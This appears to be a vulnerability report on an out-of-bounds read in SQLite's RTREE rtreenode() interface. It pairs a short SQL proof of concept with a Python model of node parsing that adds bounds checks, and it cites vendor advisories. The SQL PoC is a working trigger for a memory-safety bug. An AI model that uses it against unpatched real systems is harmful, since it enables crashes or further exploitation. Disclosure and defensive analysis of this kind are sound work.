Information

RTREE virtual tables, used for geospatial indexing, are expected to begin with an integer column (the rowid), and the RTREE interfaces, including rtreenode(), are written on that assumption. If the first column instead holds a string, as in the PoC below, and that value is passed to the rtreenode() interface, an out-of-bounds (OOB) read occurs.

Crash Dump:

(see attached Crash.png)

PoC:

CREATE VIRTUAL TABLE rtree USING rtree(a, b, c);
INSERT INTO rtree VALUES('not an int', 1, 2);
SELECT rtreenode(2, a) FROM rtree;
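As an added illustration, not part of the original report and not SQLite's own code: a Python model of how rtreenode(N, BLOB) walks an RTREE node blob, with the length check that keeps a non-node value (such as the TEXT the PoC stores in the first column) or a truncated blob from driving reads past the end of the buffer. The node layout used here (2-byte height, 2-byte big-endian cell count, then cells of an 8-byte rowid plus 2*N big-endian 32-bit floats) follows the node format in rtree.c; the function names build_node and rtreenode, and the sample cells, are this example's own.

```python
import struct

# Layout of an RTREE node blob, mirroring the format that SQLite's rtree.c
# reads in rtreenode(): 2 bytes tree height (root node only), 2 bytes
# big-endian cell count, then one cell per entry consisting of an 8-byte
# rowid followed by 2*N big-endian 32-bit floats (min, max per dimension).
HEADER_LEN = 4


def cell_size(ndim):
    """Bytes per cell for an N-dimensional tree: rowid + 2*N float32."""
    return 8 + 8 * ndim


def build_node(ndim, cells, height=0):
    """Build a well-formed node blob (example helper, not SQLite code).

    cells is a list of (rowid, [min0, max0, min1, max1, ...]) tuples.
    """
    out = bytearray(struct.pack(">HH", height, len(cells)))
    for rowid, coords in cells:
        if len(coords) != 2 * ndim:
            raise ValueError("each cell needs 2*N coordinates")
        out += struct.pack(">q", rowid)
        out += struct.pack(">%df" % (2 * ndim), *coords)
    return bytes(out)


def rtreenode(ndim, data):
    """Render a node blob as rtreenode(N, BLOB) does: "{rowid c0 c1 ...} {...}".

    Returns None when the input is rejected instead of reading out of bounds.
    """
    # A TEXT value such as 'not an int' is not a node: refuse it up front.
    if not isinstance(data, (bytes, bytearray)):
        return None
    if not 1 <= ndim <= 5 or len(data) < HEADER_LEN:
        return None
    ncell = struct.unpack_from(">H", data, 2)[0]
    # The bounds check: every cell about to be read must lie inside the blob.
    # Without it, a cell count taken from a short or garbage blob drives
    # reads past the end of the buffer, which is the OOB read in the report.
    if len(data) < HEADER_LEN + ncell * cell_size(ndim):
        return None
    cells = []
    for i in range(ncell):
        off = HEADER_LEN + i * cell_size(ndim)
        rowid = struct.unpack_from(">q", data, off)[0]
        coords = struct.unpack_from(">%df" % (2 * ndim), data, off + 8)
        cells.append("{%d %s}" % (rowid, " ".join("%g" % c for c in coords)))
    return " ".join(cells)


if __name__ == "__main__":
    # Constructed sample: a 2-D node with two cells, then the PoC's TEXT value.
    node = build_node(2, [(1, [0.0, 1.0, 0.0, 2.0]), (7, [-1.5, 3.0, 2.0, 2.5])])
    print(rtreenode(2, node))
    print(rtreenode(2, "not an int"))
```

The model rejects three classes of input that a C implementation reading straight from the blob would otherwise walk off the end of: a non-BLOB argument, a blob shorter than its 4-byte header, and a blob whose cell count claims more cells than the bytes it actually carries.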

Attachments:
Crash.png

References:
https://support.apple.com/en-us/HT210118
https://support.apple.com/en-us/HT210119
https://research.checkpoint.com/select-code_execution-from-using-sqlite/